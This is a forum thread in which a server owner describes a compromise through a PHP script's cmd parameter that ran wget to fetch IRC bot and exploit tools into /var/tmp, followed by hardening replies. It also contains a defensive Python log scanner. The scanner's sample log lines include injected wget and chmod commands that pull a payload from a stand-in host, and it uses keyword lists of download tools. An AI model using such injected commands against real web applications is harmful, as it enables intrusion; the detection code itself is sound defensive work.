eidolon tree
Aug 30 2004, 11:55 AM
I know it's a silly question, but here goes:
I was recently hacked and had to order a restore. What I want to know is, is my server "live" after the restore? Will my box be vulnerable to attack if it comes back on while I'm at work, and I haven't had time to lock him up proper? Or is the box restored and only open to ssh until told otherwise?
The bastards got in through MSIE using a wget command line in a simple php script on a website. The website used to insert content, and the hackers added &cmd=wget to upload eggdrop, massplo, and bindary to my var/tmp folder.
I thought I had it tight, no direct login for root, telnet not enabled, only sshd 2, bound only to my IP address, listening on a secret port, on a private ip address, firewall, chkrootkit, rootkithunter, email on root access, cron jobs and all the rest of that good stuff. I searched through all the threads on making my server a secure place.
Ah, the indignity. I was hacked through MSIE.
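A log check for the pattern this post describes, added here as an example (it is not code from the thread): it scans Apache-style access log lines for a `cmd`-style parameter whose value starts with a download tool or references /var/tmp, which is how the injected wget would show up in the web server log. The log lines, parameter names and IP addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names commonly abused for command injection ("&cmd=" in the thread).
CMD_PARAMS = {"cmd", "exec", "command"}
# Download tools the injected command usually starts with (wget in this case).
DOWNLOAD_TOOLS = {"wget", "curl", "fetch", "lynx"}
# World-writable locations where fetched binaries get dropped (/var/tmp here).
TMP_DIRS = ("/var/tmp", "/tmp/", "/dev/shm")

# Apache "combined"-style access log line; only the fields this check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines in the shape of the compromise described in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Aug/2004:03:12:44 -0500] "GET /insert.php?page=news HTTP/1.1" 200 1532
203.0.113.7 - - [30/Aug/2004:03:13:01 -0500] "GET /insert.php?page=news&cmd=wget%20http://198.51.100.9/eggdrop.tgz%20-O%20/var/tmp/eggdrop.tgz HTTP/1.1" 200 87
198.51.100.23 - - [30/Aug/2004:03:20:15 -0500] "GET /insert.php?page=about HTTP/1.1" 200 2201
203.0.113.7 - - [30/Aug/2004:03:14:09 -0500] "GET /insert.php?page=news&cmd=chmod%20755%20/var/tmp/eggdrop HTTP/1.1" 200 12
"""

def classify(url):
    """Return the reasons a request URL looks like shell-command injection."""
    reasons = []
    # parse_qs percent-decodes values, so "wget%20http..." becomes "wget http..."
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for val in values:
            tokens = val.split()
            tool = tokens[0].rsplit("/", 1)[-1] if tokens else ""  # /usr/bin/wget -> wget
            if name.lower() in CMD_PARAMS:
                reasons.append(f"command parameter '{name}'")
            if tool in DOWNLOAD_TOOLS:
                reasons.append(f"download tool '{tool}' in '{name}'")
            if any(d in val for d in TMP_DIRS):
                reasons.append(f"world-writable dir referenced in '{name}'")
    return reasons

def scan_log(text):
    """Return (client ip, url, reasons) for each suspicious request in an access log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify(m["url"])):
            findings.append((m["ip"], m["url"], reasons))
    return findings
```

Calling `scan_log(SAMPLE_LOG)` flags the two injected requests from 203.0.113.7 and nothing else; pass it the contents of a real access log to run the same check on live data.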
AeroStar
Aug 30 2004, 01:45 PM
there is a lot more to securing a box than what you have mentioned. but after a restore it will come back online just as a new machine. since you're under the same ip you can still be hacked, but i am guessing a user hacked a php script that you were hosting and they won't get in until that user is back up.
try running phpsuexec and securing php better.
disable compilers just in case and secure tmp.
could also limit wget access
~Tim
eidolon tree
Aug 30 2004, 02:25 PM
yeah, i already limited wget access, that's what they used to get in. i did a fair amount of other things to secure my box, i just didn't feel like making a laundry list.
Yeah, the user hacked a php script, and I noted which one it was. Very simple, tiny little script. I'm still cussing about it.
eth00
Aug 30 2004, 05:15 PM
Look in my signature; the guide there will help out a lot by securing /tmp, setting up mod_security, among other things. No server is totally secure, but it will certainly help.